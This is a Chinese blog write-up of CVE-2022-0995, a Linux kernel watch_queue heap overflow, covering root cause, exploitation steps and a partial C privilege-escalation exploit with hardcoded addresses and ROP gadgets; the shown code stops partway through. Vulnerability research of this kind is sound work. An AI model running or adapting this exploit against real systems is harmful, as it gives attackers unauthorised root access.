CVE-2022-0995 Linux kernel 观测队列子系统堆溢出漏洞分析

CVE-2022-0995 Linux kernel 观测队列子系统堆溢出漏洞分析
2022-4-12 22:10:42 Author: xz.aliyun.com(查看原文) 阅读量:12 收藏

CVE-2022-0995 是近日爆出来的一个存在于 观察队列事件通知子系统（watch_queue event notification subsystem）中的一个堆溢出漏洞，该漏洞自内核版本 5.8 中伴随着 watch queue subsystem 引入，在 5.17-rc7 版本中被修复

不过虽然获得了 7.1 的 CVSS 评分，但这个漏洞似乎并没有什么热度，不过在笔者看来这仍然是一个品相不错的漏洞

在开始之前我们先来补充一些基础知识

General notification mechanism

参见https://www.kernel.org/doc/html/latest/watch_queue.html

通用通知机制 是建立在标准管道驱动之上的，其可以有效地将来自内核的通知消息拼接到用户打开的管道中，我们可以通过 CONFIG_WATCH_QUEUE 编译选项启用（默认开启）

该机制通过一个以特殊模式打开的管道实现，内核生成的消息被保存到管道内部的循环环形缓冲区中（pipe_buffer 队列），通过 read() 进行读取；在此类管道上禁用了 splice、vmsplice 以及 tee，因为这些操作在某些情况下可能需要撤销其已经添加到环上的内容，而这些内容此时可能已经与通知消息交织在一起

管道的所有者应当告诉内核哪些资源其想要通过该管道进行观察，只有连接到该管道上的资源才会往里边插入消息，需要注意的是一个资源可能会与多个管道绑定并同时将消息插入所有管道

若环中没有可用的插槽或可用的预分配的 message buffer（一个管道默认只有 16 个 pipe_buffer ——对应 16 张内存页），则消息将会被丢弃，在这两种情况下，read() 将在读取当前缓冲区的最后一条消息后将 WATCH_META_LOSS_NOTIFICATION 插入输出缓冲区

Watch Queue（Notification Output）API

一个 观测队列 （watch queue）是由一个应用分配的用以记录通知的缓冲区，其工作原理完全隐藏在管道设备驱动中，但有必要获得一个对其的引用以设置一个观测，可以通过以下 API 进行管理：

struct watch_queue *get_watch_queue(int fd);

由于观测队列在内核中通过实现缓冲区的管道的文件描述符表示，用户空间必须通过系统调用传递该文件描述符，这可以用于从系统调用中查找指向观测队列的不透明指针
void put_watch_queue(struct watch_queue *wqueue);

该函数用以丢弃从 get_watch_queue() 获得的引用

Event Filter

当一个观测队列被创建后，我们可以应用一组 过滤器 （filters）以限制接收的事件：

struct watch_notification_filter filter = {
        ...
};
ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter)

其中 filter 应为一个 struct watch_notification_filter 类型变量，其中 nr_filters 表示 filters[] 数组中过滤器的数量，而 __reserved 应为 0：

/*
 * Argument block passed to ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, ...):
 * a fixed header followed by nr_filters type-filter entries.
 */
struct watch_notification_filter {
        /* Number of entries in filters[] */
        __u32   nr_filters;
        /* Should be 0 */
        __u32   __reserved;
        /* Flexible array of per-type filters */
        struct watch_notification_type_filter filters[];
};

filters[] 为一个 watch_notification_type_filter 类型的结构体数组，该结构体定义如下：

/*
 * One filter entry: selects an event type and narrows it by info bits and
 * by subtype.
 */
struct watch_notification_type_filter {
        /* Event type to filter, e.g. WATCH_TYPE_KEY_NOTIFY */
        __u32   type;
        /* A record is written only if (watch.info & info_mask) == info_filter */
        __u32   info_filter;
        __u32   info_mask;
        /* Bitmask of wanted subtypes: bit 0 of subtype_filter[0] is subtype 0, bit 1 is subtype 1, ... */
        __u32   subtype_filter[8];
};

type 为要过滤的事件类型，应当为类似 WATCH_TYPE_KEY_NOTIFY 的值
info_filter 与 info_mask 充当通知记录的信息字段的过滤器，仅在以下情况才将通知写入缓冲区：
```
(watch.info & info_mask) == info_filter
```
例如，这可以用于忽略不在一个挂载树上的观测点的事件
subtype_filter 为一个指示我们感兴趣的子类型的 bitmask，subtype_filter[0] 的 0 位对应子类型 0，1 位对应子类型 1，以此类推

若 ioctl() 的参数为 NULL，则过滤器将被移除，我们将接收到所有来自观测源的事件

内核中 watch queue subsystem 中 Event Filter 的实现

前面我们抄了一大段的 kernel document，现在我们来深入源码看一下 watch queue subsystem 的实现机制

当我们调用 ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter) 时，会调用 do_vfs_ioctl() 判断 cmd 进行处理，而我们的 IOC_WATCH_QUEUE_SET_FILTER 不在其列表中，所以最后会走到 vfs_ioctl()

/*
 * ioctl system call entry: look up the file for fd, call
 * security_file_ioctl(), then try do_vfs_ioctl() and fall back to
 * vfs_ioctl() when the command was not handled there.
 * Returns -EBADF when fd does not resolve to a file.
 */
SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
    struct fd f = fdget(fd);
    int error;

    if (!f.file)
        return -EBADF;

    error = security_file_ioctl(f.file, cmd, arg);
    if (error)
        goto out;

    /* -ENOIOCTLCMD from do_vfs_ioctl() hands the command to the file's own handler */
    error = do_vfs_ioctl(f.file, fd, cmd, arg);
    if (error == -ENOIOCTLCMD)
        error = vfs_ioctl(f.file, cmd, arg);

out:
    /* Drop the reference taken by fdget() on every path past the lookup */
    fdput(f);
    return error;
}

在 vfs_ioctl() 中会调用 file 结构体自身的函数表中的 unlocked_ioctl 指针

/*
 * Forward an ioctl to the file's ->unlocked_ioctl handler.
 * Returns -ENOTTY when the file has no such handler or when the handler
 * returns -ENOIOCTLCMD; otherwise returns the handler's result unchanged.
 */
long vfs_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    int error = -ENOTTY;

    if (!filp->f_op->unlocked_ioctl)
        goto out;

    error = filp->f_op->unlocked_ioctl(filp, cmd, arg);
    /* Translate the internal "not handled" code into -ENOTTY */
    if (error == -ENOIOCTLCMD)
        error = -ENOTTY;
 out:
    return error;
}
EXPORT_SYMBOL(vfs_ioctl);

那么这里我们需要将目光放回管道的创建流程中分配文件描述符的部分，存在如下调用链：

do_pipe2()
    __do_pipe_flags()
        create_pipe_files()
            alloc_file_pseudo()
                alloc_file()

alloc_file() 分配一个 file 结构体并将其函数表设为上层调用传入的函数表，而在 create_pipe_files() 中传入的函数表为 pipefifo_fops：

/*
 * File operations table for pipes/FIFOs. Its unlocked_ioctl slot is
 * pipe_ioctl, which is what vfs_ioctl() ends up calling for a pipe fd.
 */
const struct file_operations pipefifo_fops = {
    .open       = fifo_open,
    .llseek     = no_llseek,
    .read_iter  = pipe_read,
    .write_iter = pipe_write,
    .poll       = pipe_poll,
    .unlocked_ioctl = pipe_ioctl,
    .release    = pipe_release,
    .fasync     = pipe_fasync,
    .splice_write   = iter_file_splice_write,
};

因此最终调用到的是 pipe_ioctl()，对于 cmd IOC_WATCH_QUEUE_SET_FILTER 而言，最终会调用 watch_queue_set_filter() 函数

/*
 * ioctl handler for pipe files.
 *
 * Handles FIONREAD and, when CONFIG_WATCH_QUEUE is enabled,
 * IOC_WATCH_QUEUE_SET_SIZE and IOC_WATCH_QUEUE_SET_FILTER.
 * Any other command returns -ENOIOCTLCMD.
 */
static long pipe_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    struct pipe_inode_info *pipe = filp->private_data;
    int count, head, tail, mask;

    switch (cmd) {
    case FIONREAD:
        /* Sum the len of every buffer between tail and head while holding the pipe lock */
        __pipe_lock(pipe);
        count = 0;
        head = pipe->head;
        tail = pipe->tail;
        /* Used as an index mask below; presumably ring_size is a power of two (not shown here) */
        mask = pipe->ring_size - 1;

        while (tail != head) {
            count += pipe->bufs[tail & mask].len;
            tail++;
        }
        __pipe_unlock(pipe);

        /* Report the byte count through the user pointer passed in arg */
        return put_user(count, (int __user *)arg);

#ifdef CONFIG_WATCH_QUEUE
    case IOC_WATCH_QUEUE_SET_SIZE: {
        int ret;
        __pipe_lock(pipe);
        ret = watch_queue_set_size(pipe, arg);
        __pipe_unlock(pipe);
        return ret;
    }

    case IOC_WATCH_QUEUE_SET_FILTER:
        /* Unlike SET_SIZE, this call is made without taking the pipe lock here */
        return watch_queue_set_filter(
            pipe, (struct watch_notification_filter __user *)arg);
#endif

    default:
        return -ENOIOCTLCMD;
    }
}

漏洞便发生在 watch_queue_set_filter()中将 filter 数组从用户空间拷贝到内核空间的过程当中，现在让我们仔细审视这个函数的执行流程，在一开始时首先会将用户空间的 watch_notification_filter 结构拷贝到内核空间：

long watch_queue_set_filter(struct pipe_inode_info *pipe,
                struct watch_notification_filter __user *_filter)
{
    struct watch_notification_type_filter *tf;
    struct watch_notification_filter filter;
    struct watch_type_filter *q;
    struct watch_filter *wfilter;
    struct watch_queue *wqueue = pipe->watch_queue;
    int ret, nr_filter = 0, i;

    if (!wqueue)
        return -ENODEV;

    if (!_filter) {
        /* Remove the old filter */
        wfilter = NULL;
        goto set;
    }

    /* Grab the user's filter specification */
    if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
        return -EFAULT;
    if (filter.nr_filters == 0 ||
        filter.nr_filters > 16 ||
        filter.__reserved != 0)
        return -EINVAL;

之后 memdup_user() 分配一块临时空间，将用户空间的 filter 数组拷贝至该临时空间

tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
    if (IS_ERR(tf))
        return PTR_ERR(tf);

接下来会遍历每一个 watch_notification_type_filter 结构，记录 type 在指定范围的 filter 的数量到变量 nr_filter 中，这里其判断一个 type 是否合法的范围是 sizeof(wfilter->type_filter) * 8

ret = -EINVAL;
    for (i = 0; i < filter.nr_filters; i++) {
        if ((tf[i].info_filter & ~tf[i].info_mask) ||
            tf[i].info_mask & WATCH_INFO_LENGTH)
            goto err_filter;
        /* Ignore any unknown types */
        if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
            continue;
        nr_filter++;
    }

接下来会分配真正储存 filter 的空间，这里用了一个 struct_size() 导出的大小为 sizeof(*wfilter) + sizeof(wfilter->filters[0]) * nr_filter（感兴趣的同学可以自行阅读源码），注意到这里计算大小用的是我们前面遍历计算得到的 nr_filter：

/* Now we need to build the internal filter from only the relevant
     * user-specified filters.
     */
    ret = -ENOMEM;
    wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);
    if (!wfilter)
        goto err_filter;
    wfilter->nr_filters = nr_filter;

之后是将 filter 数组拷贝到分配的空间上，我们的第一个漏洞便出现在这里，其判断 type 是否合法使用的是 sizeof(wfilter->type_filter) * BITS_PER_LONG ，与前面 nr_filter 的计算存在不一致性：

q = wfilter->filters;
    for (i = 0; i < filter.nr_filters; i++) {
        if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
            continue;

        q->type         = tf[i].type;
        q->info_filter      = tf[i].info_filter;
        q->info_mask        = tf[i].info_mask;
        q->subtype_filter[0]    = tf[i].subtype_filter[0];
        __set_bit(q->type, wfilter->type_filter);
        q++;
    }

而 BITS_PER_LONG 定义于 /include/asm-generic/bitsperlong.h 中，在 32 位下为 32，64 位下为64：

#ifdef CONFIG_64BIT
#define BITS_PER_LONG 64
#else
#define BITS_PER_LONG 32
#endif /* CONFIG_64BIT */

那么前后对 type 范围的计算便存在不一致，我们不难想到的是我们可以指定几个 filter 的 type 为（计算 nr_filter 时的合法 type 上限值，拷贝 filter 时的合法 type 上限值）这个范围内的特定值，这样就能越界拷贝一定数量的 filter，从而完成堆上的越界写

那么这里我们容易计算得出触发第一个漏洞的 type 的范围应为 [0x80, 0x400)

而第二个漏洞则存在于上面这段代码中对 __set_bit() 的调用，该函数定义如下：

/*
 * Set bit nr in the bitmap that starts at addr, using a plain |= on the
 * containing word.
 *
 * No bounds check is done here: the word written is addr[BIT_WORD(nr)]
 * whatever the real size of the bitmap, so the caller must validate nr.
 */
static inline void __set_bit(int nr, volatile unsigned long *addr)
{
    unsigned long mask = BIT_MASK(nr);
    unsigned long *p = ((unsigned long *)addr) + BIT_WORD(nr);

    *p  |= mask;
}

其作用便是将 addr 偏移 BIT_WORD(nr) 个 unsigned long 处的 BIT_MASK(nr) 位进行置 1 操作，这里的 BIT_WORD() 宏主要是除以 long 类型所占位数（64），而 BIT_MASK() 宏则是对 long 类型所占位数求模后结果作为 unsigned long 值 1 左移的位数导出结果数值：

/* Mask selecting bit nr inside its word: 1 shifted left by nr modulo BITS_PER_LONG */
#define BIT_MASK(nr)        (UL(1) << ((nr) % BITS_PER_LONG))
/* Index of the unsigned long word that contains bit nr */
#define BIT_WORD(nr)        ((nr) / BITS_PER_LONG)

而传入的第一个参数刚好为 type，由于我们的 type 可以在 [0x80, 0x400) 范围内取，而分配的 filter 空间却未必有那么大，因此这里存在一个越界置 1 位的漏洞，我们可以通过设置一个较大的 type 完成堆上越界置 1 位的操作

例如对于 kmalloc-96 而言，我们的对象可以覆盖到下图所示范围（本图来自于 breezeO_o师傅的博客）：

在目前公开的 exp 中对该漏洞的利用其实是基于 __set_bit() 进行利用的，因为相较于不好控制的 filter 溢出，越界写 1 位则更方便我们控制一些指针，例如 msg_msg->m_list 双向链表

在这份公开的 exp 中使用的其实是与 CVE-2021-22555 相同的利用技巧，只不过篡改 msg_msg 头部的方式不是邻接溢出写 0，而是越界写 1；接下来笔者将使用与 CVE-2021-22555 相同的利用技巧完成对该漏洞的利用

提权

Step.I 堆喷 `msg_msg` ，建立主从消息队列，构造重叠辅助消息

现在我们有了一个堆上越界写 1 位，我们该怎么利用呢？比较朴素的一种思想便是覆写一个结构体中的指针，利用 partial overwrite 使得两个这样的结构体的头部指针指向同一个结构体，从而实现 object overlapping

那么选用什么样的结构体作为 victim 呢？这里我们选择使用 msg_msg 这一结构体，其长度可控，且开头正好是内核双向链表结构体 m_list，我们所能覆写的为其 m_list.next 指针（注意不是结构体中指向 msg_msgseg 的 next 成员）：

/* one msg_msg structure for each message */
struct msg_msg {
    /* Doubly linked list node placed at the very start of the structure */
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    /* Pointer to a struct msg_msgseg; distinct from m_list.next */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

当我们在一个消息队列上发送多个消息时，会形成如下结构：

我们不难想到的是，我们可以在一开始时先创建多个消息队列，并分别在每一个消息队列上发送两条消息，形成如下内存布局，这里为了便利后续利用，第一条消息（主消息）的大小为 96，第二条消息（辅助消息）的大小为 0x400：

之后我们读出其中几个消息队列的主消息以产生空洞，再利用 ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter) 获取到我们刚释放的 msg_msg 结构体的空间

这里需要注意的是我们至少要释放两个主消息，因为在分配到 watch_filter 之前 memdup_user() 还需要获取一个对象

tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
    if (IS_ERR(tf))
        return PTR_ERR(tf);

    //...

    /* Now we need to build the internal filter from only the relevant
     * user-specified filters.
     */
    ret = -ENOMEM;
    wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);

对于 __set_bit() 而言其可以置 1 的范围如下图所示：type 最大可取 0x3ff，即最远可以触及距对象起始 0x400 / 8 = 128 字节之内的位置，对于 96 字节的对象而言刚好可以覆盖到下一相邻 object 的前 32 字节

利用越界置 1 位我们可以覆写到其相邻的主消息的 next 指针，若该位刚好被由 0 变为 1，则我们很容易构造出在两个消息队列上存在两个主消息指向同一个辅助消息的这样的局面

我们可以通过在主从消息中放置对应的值来标识喷射的不同的消息队列，遍历读取所有队列来感知指向了同一辅助消息的两个队列

利用 MSG_COPY 标志位可以读取消息队列上的消息而不释放，参见这里

Step.II 释放辅助消息，构造 UAF

此时我们将辅助消息释放掉，便能成功完成 UAF 的构建，此时我们仍能通过其中一个消息队列访问到该辅助消息对应 object，但实际上这个 object 已经在 freelist 上了

Step.III 堆喷 `sk_buff` 伪造辅助消息，泄露 UAF obj 地址

接下来我们考虑如何利用这个 UAF，因为其仍位于消息队列上所以我们考虑伪造 msg_msg 结构体进行后续的利用，这里我们选用另外一个常用来进行堆喷的结构体——sk_buff，类似于 msg_msg，其同样可以提供近乎任意大小对象的分配写入与释放，但不同的是 msg_msg 由一个 header 加上用户数据组成，而 sk_buff 本身不包含任何用户数据，用户数据单独存放在一个 object 当中，而 sk_buff 中存放指向用户数据的指针

至于这个结构体的分配与释放也是十分简单，sk_buff 在内核网络协议栈中代表一个「包」，我们不难想到的是我们只需要创建一对 socket，在上面发送与接收数据包就能完成 sk_buff 的分配与释放，最简单的办法便是用 socketpair 系统调用创建一对 socket，之后对其 read & write 便能完成收发包的工作

接下来我们考虑如何通过伪造 msg_msg 结构体完成信息泄露，我们不难想到的是可以伪造一个 msg_msg 结构体，将其 m_ts 域设为一个较大值，从而越界读取到相邻辅助消息的 header，泄露出堆上地址

我们泄露出来的是哪个地址？让我们重新将目光放回到消息队列的结构上：

我们不难知道的是，该辅助消息的 prev 指针指向其主消息，而该辅助消息的 next 指针指向该消息队列的 msg_queue 结构，这是目前我们已知的两个“堆上地址”

接下来我们伪造 msg_msg->next，将其指向我们的 UAF object 相邻的辅助消息对应的主消息头部往前，从而读出该主消息的头部，泄露出对应的辅助消息的地址，有了这个辅助消息的地址，再减去 0x400 便是我们的 UAF 对象的地址

通过伪造 msg_msg->next 可以完成任意地址读，参见这里

Step.IV 堆喷 `pipe_buffer`，泄露内核基址

现在我们已知了可控区域的地址，接下来让我们来考虑泄露内核 .text 段的基址，以及如何劫持 RIP 完成提权

之前我们为什么将辅助消息的大小设为 0x400？除了方便对齐以外，还有一层考虑就是这个大小刚好有一个十分实用的结构体 pipe_buffer 数组，既能帮我们泄露内核代码段基址，也能帮我们劫持 RIP

当我们创建一个管道时，在内核中会生成数个连续的 pipe_buffer 结构体，申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

在 pipe_buffer 中存在一个函数表指针成员 ops（类型为 struct pipe_buf_operations *），其指向内核中的函数表 anon_pipe_buf_ops，若我们能够将其读出，便能泄露出内核基址，操作如下：

利用 sk_buff 修复辅助消息，之后从消息队列中接收该辅助消息，此时该 object 重回 slub 中，但 sk_buff 仍指向该 object
喷射 pipe_buffer，之后再接收 sk_buff 数据包，我们便能读出 pipe_buffer 上数据，泄露内核基址

Step.V 伪造 pipe_buffer，构造 ROP，劫持 RIP，完成提权

当我们关闭了管道的两端时，会触发 pipe_buffer->ops->release 这一指针，而 UAF object 的地址对我们而言是已知的，因此我们可以直接利用 sk_buff 在 UAF object 上伪造函数表与构造 ROP chain，再选一条足够合适的 gadget 完成栈迁移便能劫持 RIP 完成提权

Final EXPLOIT

最终的 exp 如下（基本上就是把 CVE-2021-22555 的 exp 里 trigger oob 的函数改一下就能打通了）：

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <linux/watch_queue.h>
#include <sys/syscall.h>

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400

#define PRIMARY_MSG_TYPE    0x41
#define SECONDARY_MSG_TYPE  0x42
#define VICTIM_MSG_TYPE     0x1337
#define MSG_TAG     0xAAAAAAAA

#define SOCKET_NUM 16
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define MSG_QUEUE_NUM 4096

#define ANON_PIPE_BUF_OPS 0xffffffff82076500
#define PREPARE_KERNEL_CRED 0xffffffff810d1350
#define INIT_CRED 0xffffffff82a63be0
#define COMMIT_CREDS 0xffffffff810d0ec0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30
#define POP_RDI_RET 0xffffffff810310a3

size_t user_cs, user_ss, user_sp, user_rflags;

void saveStatus()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

/* Userspace stand-in for a doubly linked list node; both links are held as raw 64-bit values. */
struct list_head
{
    uint64_t    next;
    uint64_t    prev;
};

/*
 * Userspace description of a message header with every field stored as a
 * 64-bit integer (six 8-byte fields, 48 bytes in total). The message buffer
 * sizes in this file subtract sizeof(struct msg_msg) from the object size.
 */
struct msg_msg
{
    struct list_head m_list;
    uint64_t    m_type;
    uint64_t    m_ts;
    uint64_t    next;
    uint64_t    security;
};

/* Userspace description of a message segment header: a single 64-bit link field. */
struct msg_msgseg
{
    uint64_t    next;
};

struct 
{
    long mtype;
    char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

struct 
{
    long mtype;
    char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

/*
 * skb_shared_info need to take 320 bytes at the tail
 * so the max size of buf we should send is:
 * 1024 - 320 = 704
 */
char fake_secondary_msg[704];

struct
{
    long mtype;
    char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/*
 * Userspace description of a pipe buffer entry with pointer fields stored
 * as 64-bit integers.
 */
struct pipe_buffer
{
    uint64_t    page;
    uint32_t    offset, len;
    uint64_t    ops;
    uint32_t    flags;
    /* Explicit 4-byte filler so that private starts on an 8-byte boundary */
    uint32_t    padding;
    uint64_t    private;
};

/* Userspace description of a pipe buffer operations table; each slot is held as a raw 64-bit value. */
struct pipe_buf_operations
{
    uint64_t    confirm;
    uint64_t    release;
    uint64_t    try_steal;
    uint64_t    get;
};

/*
 * Print an error message in bold red on stdout and terminate the process
 * with EXIT_FAILURE. Does not return.
 *
 * msg is only read, and every caller passes a string literal, so it is
 * taken as a pointer to const.
 */
void errExit(const char *msg)
{
    printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
    exit(EXIT_FAILURE);
}

/*
 * Receive one message of type msgtyp from queue msqid into msgp, with no
 * flags set.
 *
 * msgsz is the size of the whole buffer including its leading long type
 * field, so the length handed to msgrcv() is msgsz - sizeof(long).
 * Returns the result of msgrcv().
 */
int readMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const size_t payload_len = msgsz - sizeof(long);
    const int flags = 0;

    return msgrcv(msqid, msgp, payload_len, msgtyp, flags);
}

/*
 * Stamp msgtyp into the leading long of the buffer at msgp, then send the
 * buffer on queue msqid with no flags set.
 *
 * msgsz is the size of the whole buffer including the type field, so the
 * length handed to msgsnd() is msgsz - sizeof(long).
 * Returns the result of msgsnd().
 */
int writeMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    long *type_field = (long *)msgp;
    const size_t payload_len = msgsz - sizeof(long);

    *type_field = msgtyp;
    return msgsnd(msqid, msgp, payload_len, 0);
}

/*
 * Call msgrcv() on queue msqid with MSG_COPY | IPC_NOWAIT.
 *
 * msgsz is the size of the whole buffer including its leading long type
 * field, so the length handed to msgrcv() is msgsz - sizeof(long).
 * Returns the result of msgrcv().
 */
int peekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const size_t payload_len = msgsz - sizeof(long);
    const int flags = MSG_COPY | IPC_NOWAIT;

    return msgrcv(msqid, msgp, payload_len, msgtyp, flags);
}

void buildMsg(struct msg_msg *msg, uint64_t m_list_next,
    uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts, 
    uint64_t next, uint64_t security)
{
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;
    msg->m_type = m_type;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = security;
}

/*
 * Write the size-byte buffer buf SK_BUFF_NUM times to the first descriptor
 * of each of the SOCKET_NUM socket pairs, pair by pair.
 * Returns 0 when every write succeeds, -1 as soon as one write fails.
 */
int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total_writes = SOCKET_NUM * SK_BUFF_NUM;

    for (int n = 0; n < total_writes; n++)
    {
        /* Consecutive runs of SK_BUFF_NUM writes go to the same pair */
        const int pair = n / SK_BUFF_NUM;

        if (write(sk_socket[pair][0], buf, size) < 0)
            return -1;
    }

    return 0;
}

/*
 * Read up to size bytes into buf SK_BUFF_NUM times from the second
 * descriptor of each of the SOCKET_NUM socket pairs, pair by pair.
 * Returns 0 when every read succeeds, -1 as soon as one read fails.
 */
int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total_reads = SOCKET_NUM * SK_BUFF_NUM;

    for (int n = 0; n < total_reads; n++)
    {
        /* Consecutive runs of SK_BUFF_NUM reads come from the same pair */
        const int pair = n / SK_BUFF_NUM;

        if (read(sk_socket[pair][1], buf, size) < 0)
            return -1;
    }

    return 0;
}

void trigerOutOfBoundWrite(int pipe_fd[2])
{
    struct watch_notification_filter *wfilter;
    unsigned int nfilters;

    nfilters = 4;
    wfilter = (struct watch_notification_filter*)
            calloc(1, sizeof(struct watch_notification_filter)
                + nfilters * sizeof(struct watch_notification_type_filter));
    wfilter->nr_filters = nfilters;

    // normal filter
    for (int i = 0; i < (nfilters - 1); i++)
        wfilter->filters[i].type = 1;

    // evil filter
    // 0x300 = 64 * 12, 12 * 8 = 96bytes
    // 1 << 0xa = 1024, maybe we can hit a proper bit
    wfilter->filters[nfilters - 1].type = 0x30a;

    // triger oob write
    if (ioctl(pipe_fd[0], IOC_WATCH_QUEUE_SET_FILTER, wfilter) < 0)
        errExit("failed to ioctl IOC_WATCH_QUEUE_SET_FILTER!");

    // prevent memory leak in userspace(no need in fact)
    free(wfilter);
}

void getRootShell(void)
{
    if (getuid())
        errExit("failed to gain the root!");

    printf("\033[32m\033[1m[+] Succesfully gain the root privilege, trigerring root shell now...\033[0m\n");
    system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
    int         oob_pipe_fd[2];
    int         sk_sockets[SOCKET_NUM][2];
    int         pipe_fd[PIPE_NUM][2];
    int         msqid[MSG_QUEUE_NUM];
    int         victim_qid, real_qid;
    struct msg_msg  *nearby_msg;
    struct msg_msg  *nearby_msg_prim;
    struct pipe_buffer *pipe_buf_ptr;
    struct pipe_buf_operations *ops_ptr;
    uint64_t    victim_addr;
    uint64_t    kernel_base;
    uint64_t    kernel_offset;
    uint64_t    *rop_chain;
    int         rop_idx;
    cpu_set_t   cpu_set;

    saveStatus();

    /*
     * Step.O
     * Initialization
     */
    puts("\033[32m\033[1m[+] CVE-2022-0995 Linux Privilege Escalation.\033[0m");

    // run the exp on specific core only
    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // pipe to trigert off-by-null
    if (pipe2(oob_pipe_fd, O_NOTIFICATION_PIPE) < 0)
        errExit("failed to create O_NOTIFICATION_PIPE!");

    // socket pairs to spray sk_buff
    for (int i = 0; i < SOCKET_NUM; i++)
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0)
            errExit("failed to create socket pair!");

    /*
     * Step.I
     * build msg_queue, spray primary and secondary msg_msg,
     * and use OOB write to construct the overlapping
     */
    puts("\n\033[34m\033[1m[*] Step.I spray msg_msg, construct overlapping object\033[0m");

    puts("[*] Build message queue...");
    // build 4096 message queue
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
            errExit("failed to create msg_queue!");
    }

    puts("[*] Spray primary and secondary msg_msg...");

    memset(&primary_msg, 0, sizeof(primary_msg));
    memset(&secondary_msg, 0, sizeof(secondary_msg));

    // spray primary and secondary message
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        *(int *)&primary_msg.mtext[0] = MSG_TAG;
        *(int *)&primary_msg.mtext[4] = i;
        if (writeMsg(msqid[i], &primary_msg, 
                sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
            errExit("failed to send primary msg!");

        *(int *)&secondary_msg.mtext[0] = MSG_TAG;
        *(int *)&secondary_msg.mtext[4] = i;
        if (writeMsg(msqid[i], &secondary_msg, 
                sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
            errExit("failed to send secondary msg!");
    }

    // create hole in primary msg_msg
    puts("[*] Create holes in primary msg_msg...");
    for (int i = 0; i < MSG_QUEUE_NUM; i += 1024)
    {
        if (readMsg(msqid[i], &primary_msg, 
                sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
            errExit("failed to receive primary msg!");
    }

    // triger off-by-null on primary msg_msg
    puts("[*] Trigger OOB write to construct the overlapping...");
    trigerOutOfBoundWrite(oob_pipe_fd);

    // find the queues that have the same secondary msg_msg
    puts("[*] Checking whether succeeded to make overlapping...");
    victim_qid = real_qid = -1;
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((i % 1024) == 0)  // the hole
            continue;

        if (peekMsg(msqid[i], &secondary_msg, 
                sizeof(secondary_msg), 1) < 0)
        {
            printf("[x] error qid: %d\n", i);
            errExit("failed to receive secondary msg!");
        }

        if (*(int*) &secondary_msg.mtext[0] != MSG_TAG)
            errExit("failed to make corruption!");

        if (*(int*) &secondary_msg.mtext[4] != i)
        {
            victim_qid = i;
            real_qid = *(int*) &secondary_msg.mtext[4];
            break;
        }
    }

    if (victim_qid < 0)
        errExit("failed to make overlapping!");

    printf("\033[32m\033[1m[+] victim qid:\033[0m %d \033[32m\033[1m real qid: \033[0m %d\n", 
            victim_qid, real_qid);

    /*
     * Step.II
     * construct UAF
     */
    puts("\n\033[34m\033[1m[*] Step.II construct UAF\033[0m");

    // free the victim secondary msg_msg, then we get a UAF
    if (readMsg(msqid[real_qid], &secondary_msg, 
                sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
        errExit("failed to receive secondary msg!");

